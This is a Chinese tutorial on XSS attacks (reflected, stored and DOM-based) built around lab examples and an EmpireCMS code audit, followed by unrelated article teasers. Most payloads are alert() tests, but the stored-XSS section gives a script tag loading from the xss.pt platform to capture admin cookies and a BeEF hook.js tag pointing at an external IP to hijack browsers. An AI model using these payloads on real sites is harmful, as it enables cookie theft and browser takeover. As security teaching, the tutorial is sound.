WEB 攻防-通用漏-XSS 跨站脚本攻击-反射型/存储型/DOMBEEF-XSS

XSS跨站脚本攻击技术(一)

XSS的定义

XSS攻击,全称为跨站脚本攻击,是指攻击者通过在网页中插入恶意脚本代码,当用户浏览该网页时,恶意脚本会被执行,从而达到攻击目的的一种安全漏洞。这些恶意脚本可以窃取用户的敏感信息,如Cookie、会话令牌等,或者诱导用户执行不安全的操作,如点击恶意链接、下载恶意软件等。

XSS的原理

它是由前端JavaScript代码造成的,具体来说,是Web应用程序在处理用户输入时未能充分验证和过滤,导致恶意脚本被注入到网页中并由用户的浏览器执行。这种漏洞通常发生在动态网页中,其中JavaScript代码用于与服务器进行交互、更新页面内容或处理用户输入。由于JavaScript代码在用户的浏览器中执行,因此攻击者可以利用这一特性来构造恶意脚本,从而控制用户的浏览器进行恶意操作。

XSS的危害

理论上,只要JavaScript功能能够实现的操作,XSS攻击都有可能加以利用并实现。如:

  1. 实施网络钓鱼,包括窃取各类用户账号信息,严重威胁用户的信息安全。
  2. 窃取浏览器中用户的cookies资料,进而获取用户的隐私信息,甚至利用用户身份对网站执行非法操作。
  3. 劫持用户(浏览器)会话,使攻击者能够执行任意操作,如非法转账、发表日志、发送邮件等,对用户造成直接的经济损失或声誉损害。
  4. 强制弹出广告页面、刷流量等,干扰用户的正常使用体验,同时损害网站的正常运营。
  5. 网页挂马,将恶意软件或病毒植入用户电脑,进一步危害用户的系统安全。
  6. 进行恶意操作,如任意篡改页面信息、删除文章等,破坏网站内容的完整性和真实性。
  7. 发起大量的客户端攻击,如DDoS攻击,影响网站的正常访问和稳定性。
  8. 获取客户端信息,如用户的浏览历史、真实IP、开放端口等,为进一步的攻击提供情报支持。
  9. 控制受害者机器向其他网站发起攻击,形成攻击链,扩大攻击范围。
  10. 结合其他漏洞,如CSRF漏洞,实施更为复杂的攻击,提升攻击的成功率和危害性。
  11. 提升用户权限,包括进一步渗透网站,获取更高级别的访问权限和数据访问能力。
  12. 传播跨站脚本蠕虫,实现自动化的攻击传播和感染,造成更广泛的网络安全威胁。

XSS攻击的主要类型

反射型XSS

定义:反射型XSS,也称为非持久型或参数型XSS,是指攻击者通过构造包含恶意脚本的URL参数,当用户点击该链接时,恶意脚本会被回显到网页上并执行。

特点:反射型XSS攻击通常发生在用户与Web应用程序进行交互时,如搜索、提交表单等。由于恶意脚本是通过URL参数传递的,因此其生命周期较短,一旦用户关闭页面或清除浏览器缓存,恶意脚本就会消失。

示例

有这么一个情况,如后端接受GET请求中的变量,并在前端直接输出该变量,

<?php
// 接收GET请求中的'x'参数
$code = $_GET['x'];

// 直接输出变量,未进行任何过滤或转义
echo $code;
?>

正常访问

当你使用正常参数访问该页面时,比如:x=1123

x接收到值会在页面中显示,假如传输x的值改成JavaScript的弹窗代码:

x=<script>alert(1)</script>

查看源代码,发现显示内容会出现在审查元素中:

按正常来说,应该显示<script>alert(1)</script>,但是这里显示空白。是因为这段代码被当成JavaScript代码去执行了。执行出的效果就是弹窗。
在产生过程中,有一个输入的值,还有个输出的值。这就是跨站产生的基本原理。但这种漏洞是一次性的,只有访问构造的地址http://127.0.0.1:8081/web/mysql/xss.php?x=<script>alert(1)</script>才可以触发此类漏洞。必须构造给别人,让别人访问,才能触发漏洞。 

在这里,“反射”指的是恶意脚本被服务器接收后,几乎立即被“反射”回用户的浏览器,就像一面镜子一样。

存储型XSS(攻击代码被写进了数据库里)

定义:存储型XSS,也称为持久型XSS,是指攻击者将包含恶意脚本的内容提交到Web应用程序中,并永久存储在服务器上。当其他用户浏览该内容时,恶意脚本会被执行。

特点:存储型XSS攻击的危害性较大,因为恶意脚本被永久存储在服务器上,可以持续影响所有访问该内容的用户。此外,攻击者还可以利用存储型XSS攻击进行更复杂的攻击,如传播跨站脚本蠕虫、构建僵尸网络等。

危害:存储型XSS可能导致用户信息泄露、账户劫持、恶意软件传播等严重后果。攻击者可以利用窃取的用户Cookie进行会话劫持,或者诱导用户执行不安全的操作,如输入敏感信息、下载恶意软件等。安全产商一般只会接受存储型XSS,不会接受反射型XSS(太鸡肋)。

示例:

场景描述

假设有一个在线留言板应用,允许用户提交留言并显示在网页上。这些留言被存储在服务器的数据库中,当用户访问留言板页面时,服务器会从数据库中检索留言并显示在网页上。

攻击过程

  1. 恶意输入:
    • 攻击者在留言框中输入一段包含恶意脚本的留言,例如:<script>alert('恶意代码执行!');</script>
    • 攻击者提交这段留言。
  2. 存储恶意代码:
    • 服务器接收到这段留言后,未进行充分的验证或过滤,就将其存储在数据库中。
  3. 反射恶意代码:
    • 当其他用户访问留言板页面时,服务器从数据库中检索留言,并将其嵌入到HTML页面中返回给用户。
    • 由于恶意代码被直接嵌入到页面中,当用户的浏览器解析这段HTML时,会执行其中的恶意脚本。
  4. 攻击结果:
    • 用户的浏览器弹出一个警告框,显示“恶意代码执行!”。
    • 这只是恶意脚本的一个简单示例,实际攻击中,恶意脚本可能会窃取用户的敏感信息、执行未经授权的操作、重定向用户到恶意网站等。

DOM型XSS

定义:DOM型XSS是指攻击者通过构造特殊URL或利用网页功能发送恶意代码请求,当受害者浏览器处理这些请求时,会修改DOM树并执行恶意脚本。DOM型不与后台服务器产生数据交互,是一种通过DOM操作前端代码输出的时候产生的问题,一次性也属于反射型。所以DOM型xss取决于输出位置,并不取决于输出环境,因此DOM型xss既有可能是反射型的,也有可能是存储型的

特点:与反射型和存储型XSS不同,DOM型XSS的攻击载荷是在受害者浏览器本地执行的。因此,其相对难以通过传统的输入验证和过滤方法进行防御。此外,DOM型XSS攻击通常与Web应用程序的具体实现细节相关,因此其攻击方式和防御措施也因人而异。

示例:pikachu靶场-DOM型,代码如下

点击click me后, F12查看具体情况,可以看出输入内容会构造一个a标签,并将输入内容作为参数href的值,放在id=dom的容器里

而把而已代码拼接到了a标签里面,尝试构造闭合触发弹窗 

#" onclick="alert('xss')">

 

真实案例和XSS平台

1. 反射型实例-UA查询平台数据输出

平台:useragent.openadmintools.com

访问这个平台,可以发现他抓取了访问者的浏览器信息,重新进行访问,抓包,修改数据包UA头。

<script>alert(xss)</script>

数据包发送,就可以看到浏览器弹窗。

 

但是这类漏洞构成危害不大。因为这个需要在UA头中修改,那么要怎么发给别人。别人访问的时候又不会修改UA头再去访问。

反射型xss的漏洞不好利用的原因:

  ①让对方去访问构造地址;

  ②对方是网站管理员,获取其登录的cookies信息;

  ③浏览器会自动过滤xss的攻击;

 

2. 存储型实例-订单系统CMS权限获取

① 前台填写信息(包含了XSS代码),下订单;

② XSS代码被插入到了数据库;

③ 登录后台进行订单查看时,js代码被执行,弹出js执行代码的窗口,这就形成了xss攻击。

进行留言,在留言上写上payload

那么如何获取管理员的cookie呢?

xss利用平台:网上找或者自己搭建

(1)网上找的平台,注册一个账号:比如,https://xss.pt/xss.php

① 创建项目,然后进行功能选择,查看代码

1645690039564-0e49524e-a0bb-4bc7-a66a-486df581885e.png

② 复制一个代码:<sCRiPt sRC=//xss.pt/X8Vz></sCrIpT>

③ 将代码从目标网站的前台写入

④ 等待目标网站的管理员访问,在下面等待cookie的接收

 

 

回到xss平台

 

比如对后台admin/admin.php?uid=3进行访问,抓包。将获得的cookie信息复制到数据包中。

但是这个cookie不能进行登录,因为这个平台获取到的cookie信息不完整,在正常登录中cookie中还有phpsessid的值,未获取到;
这个网站采用的不是cookie验证,而是phpsessid进行验证,所以无法登录后台。通常,有的网站不止使用cookie,还会使用phpsessid、httponly等进行登录保护。

 

(2)自己搭建xss利用平台(BeEF平台)

搭建:https://blog.csdn.net/qq_40624810/article/details/110958036

kali安装docker:https://blog.csdn.net/m0_67844671/article/details/132872790

安装BeEF:Beef-Xss 浏览器攻击框架的使用_docker安装beef-xss-CSDN博客

安装完成后,访问http://192.168.132.130:3000/ui/panel

默认账号密码beef,beef

在BeEF网站下面有一个hook.js文件,只要加载了这个地址,就会劫持这个浏览器。
将xss跨站代码写入到登录成功的文件,比如admin/index.php文件
<script src="http://47.100.167.248:3000/hook.js"></script>  //注意IP地址改成自己beef的ip
这个平台也可以获取cookie,跳转,下载,钓鱼,伪装成flash。

3.DOM型实例-EmpireCMS前端页面审计

DOM类型的全都是前端的代码,所以基本上都是白盒审计
在upload/e/Viewimg/index.html 发现关键代码:
if(Request("url")!=0){
document.write("<a title=\"点击观看完整的图片...\" href=\""+Request("url")+"\" target=\"_blank\"><img src=\""+Request("url")+"\" border=0 class=\"picborder\" onmousewheel=\"return bbimg(this)\" οnlοad=\"if(this.width>screen.width-500)this.style.width=screen.width-500;\">");
}

 

追踪request函数

 

 简单来说,这个request函数就是用来接收URL的地址

那么要怎么构造他呢?

访问地址http://127.0.0.1:8103/e/Viewimg/index.html

测试:http://127.0.0.1:8103/e/Viewimg/index.html?url=1

url的参数1在路径访问时并没有被当做参数,而是直接被当做文件名访问,那么应该怎么触发跨站呢?
http://127.0.0.1:8103/e/Viewimg/index.html?url=javascript:alert(1) 
这样子构造在源代码中
document.write("<a title=\"点击观看完整的图片...\" href=\""+javascript:alert(1)+"\" target=\"_blank\"><img src=\""+Request("url")+"\" border=0 class=\"picborder\" onmousewheel=\"return bbimg(this)\" οnlοad=\"if(this.width>screen.width-500)this.style.width=screen.width-500;\">");

点击后的地址进行了弹窗:即这个地址http://127.0.0.1:8103/e/Viewimg/javascript:alert(1)执行了js代码

五、XSS平台与工具框架预告

  • XSS平台:介绍XSS攻击平台的概念,并预告后续文章将详细介绍常见的XSS平台。
  • BEEF-XSS框架:提及BEEF框架,并预告后续文章将深入探讨其使用方法和功能。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/953835.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Vue3组件设计模式:高可复用性组件开发实战

Vue3组件设计模式:高可复用性组件开发实战 一、前言 在Vue3中&#xff0c;组件设计和开发是非常重要的&#xff0c;它直接影响到应用的可维护性和可复用性。本文将介绍如何利用Vue3组件设计模式来开发高可复用性的组件&#xff0c;让你的组件更加灵活和易于维护。 二、单一职责…

深度剖析RabbitMQ:从基础组件到管理页面详解

文章目录 一、简介二、Overview2.1 Overview->Totals2.2 Overview->Nodesbroker的属性2.3 Overview->Churn statistics2.4 Overview->Ports and contexts2.5 Overview->Export definitions2.6 Overview->Import definitions 三、Connections连接的属性 四、C…

Unity 语音转文字 Vosk 离线库

市场有很多语音库&#xff0c;这里介绍Vosk SDK 除了支持untiy外还有原生开发服务器等 目录 安装unity示例demo下载语音训练文件运行demo结尾一键三联 注意事项 有可能debug出来的文本是空的&#xff0c;&#xff08;确保麦克风正常&#xff0c;且索引正确&#xff09;分大…

播放音频文件同步音频文本

播放音频同步音频文本 对应单个文本高亮显示 使用audio音频文件对应音频文本资源 音频文本内容&#xff08;Json&#xff09; [{"end": 4875,"index": 0,"speaker": 0,"start": 30,"text": "70号二啊,","tex…

【React】新建React项目

目录 create-react-app基础运用React核心依赖React 核心思想&#xff1a;数据驱动React 采用 MVC体系package.jsonindex.html好书推荐 官方提供了快速构建React 项目的脚手架&#xff1a; create-react-app &#xff0c;目前使用它安装默认是19版本&#xff0c;我们这里降为18…

mac homebrew配置使用

本文介绍mac上homebrew工具的安装、配置过程。homebrew功能类似于centos的yum&#xff0c;用于软件包的管理&#xff0c;使用上有命令的差异。 本次配置过程使用mac&#xff0c;看官方文档&#xff0c;在linux上也可以用&#xff0c;但我没试过&#xff0c;有兴趣的同学可以试试…

第一次作业三种方式安装mysql(Windows和linux下)作业

在Windows11上安装sever&#xff08;服务&#xff09;端和客户端 server端安装 打开官网MySQL 进入到主页 点击DOWMLOAD 进入下载界面 点击下方MySQL Community (GPL) Downloads 进入社区版mysql下载界面 点击 MySQL Community Server 进入server端下载 选择8.4.3LTS&…

基于Media+Unity的手部位姿三维位姿估计

使用mediapipe Unity 手部位姿三维位姿估计 参考文章 基于Mediapipe的姿势识别并同步到Unity人体模型中 MediapipeUnity3d实现虚拟手_unity mediapipe-CSDN博客 需求 我的需求就是快速、准确的跟踪手部位姿并实现一个三维显示。 主要思路 搭建mdeiapipe系统&#xff0c…

【C++】IO 流

文章目录 &#x1f449;C 语言的输入与输出&#x1f448;&#x1f449;流是什么&#x1f448;&#x1f449;C IO 流&#x1f448;C 标准 IO 流C 和 C 语言的输入格式问题C 的多次输入内置类型和自定义类型的转换日期的多次输入C 文件 IO 流文本文件和二进制文件的读写 &#x1…

成功案例分享 — 芯科科技助力涂鸦智能打造Matter over Thread模块,简化Matter设备开发

芯科科技&#xff08;Silicon Labs&#xff09;的愿景之一是让开发者每天都能够更轻松地开发无线物联网&#xff08;IoT&#xff09;。特别是在拥有相同愿景的合作伙伴的帮助下&#xff0c;我们每天都在取得进步。但是要想弥合知识水平和物联网开发之间的差距仍会面临一定的挑战…

MySQL主从部署(保姆版)

一、mysql 同步复制有关概述 一般数据库都是读取压力大于写数据压力&#xff0c;主从复制即为了实现数据库的负载均衡和读写分离。通过将Mysql的某一台主机的数据复制到其它主机&#xff08;slaves&#xff09;上&#xff0c;主服务器只负责写&#xff0c;而从服务器只负责读。…

浅谈计算机网络02 | SDN控制平面

计算机网络控制平面 一、现代计算机网络控制平面概述1.1 与数据平面、管理平面的关系1.2 控制平面的发展历程 二、控制平面的关键技术剖析2.1 网络层协议2.1.1 OSPF协议2.1.2 BGP协议 2.2 SDN控制平面技术2.2.1 SDN架构与原理2.2.2 OpenFlow协议2.2.3 SDN控制器 一、现代计算机…

基于网络爬虫技术的网络新闻分析【源码+文档+部署讲解】

目 录 1 绪论 1.1 论文研究背景与意义 1.2 论文研究内容 2 系统需求分析 2.1 系统需求概述 2.2 系统需求分析 2.2.1 系统功能要求 2.2.2 系统IPO图 2.2 系统非功能性需求分析 3系统概要设计 3.1 设计约束 3.1.1需求约束 3.1.2设计策略 3.1.3 技术实现 3.3 模块…

WeakAuras NES Script(lua)

WeakAuras NES Script 修星脚本字符串 脚本1&#xff1a;NES !WA:2!TMZFWXX1zDxVAs4siiRKiBN4eV(sTRKZ5Z6opYbhQQSoPtsxr(K8ENSJtS50(J3D7wV3UBF7E6hgmKOXdjKsgAvZFaPTtte0mD60XdCmmecDMKruyykDcplAZiGPfWtSsag6myGuOuq89EVDV9wPvKeGBM7U99EFVVVV33VFFB8Z2TJ8azYMlZj7Ur3QDR(…

网络安全学习81天(记录)

前言&#xff1a; 小迪安全&#xff0c;81天&#xff0c;开始了php代码审计 思路&#xff1a; 内容&#xff1a; #知识点&#xff1a; 1、审计漏洞-SQL 数据库注入挖掘 1、审计思路-正则搜索&功能追踪&辅助工具 3、审计类型-常规架构&MVC 架构&三方框架 #章…

1.14 互斥与同步

1.思维导图 2.有一个隧道&#xff0c;长1000m&#xff0c;有一辆高铁&#xff0c;每秒100米&#xff1b;有一辆快车&#xff0c;每秒50米&#xff1b;要求模拟这两列火车通过隧道的场景。 1>程序代码&#xff1a; #include <stdio.h> #include <string.h> #i…

研华 PCI-1751 驱动更新导LabVIEW致程序异常

问题描述&#xff1a; 某 LabVIEW 程序长期运行正常&#xff0c;但在使用研华 PCI-1751 数据采集卡运行一段时间后&#xff0c;程序开始出现不正常的行为。具体过程如下&#xff1a; 初始问题&#xff1a; 更换新的 PCI-1751 板卡后&#xff0c;驱动程序被更新&#xff0c;但程…

基于微信小程序的游泳馆管理系统设计与实现(LW+源码+讲解)

专注于大学生项目实战开发,讲解,毕业答疑辅导&#xff0c;欢迎高校老师/同行前辈交流合作✌。 技术范围&#xff1a;SpringBoot、Vue、SSM、HLMT、小程序、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、安卓app、大数据、物联网、机器学习等设计与开发。 主要内容&#xff1a;…

LabVIEW智能水肥一体灌溉控制系统

本文详细介绍了一种基于LabVIEW的智能水肥一体灌溉控制系统的设计与实现。该系统采用模糊控制策略&#xff0c;能够自动调节土壤湿度和肥液浓度&#xff0c;满足不同作物在不同生长阶段的需求&#xff0c;有效提高水肥利用效率&#xff0c;对现代精准农业具有重要的实践和推广价…

ChordCraft荣获重要认可:推动全球音乐教育的数字化革新

2024年12月21日,洛杉矶尔湾市——在今年的文化艺术交流会上,聚集了来自各地的艺术家及社区领袖,共同探讨艺术如何促进全球文化的多样性和教育的普及。 张庭玮(Ting-Wei Chang)女士,University of North Texas音乐艺术博士,是一位享誉国际的单簧管演奏家和音乐教育者。她不仅在…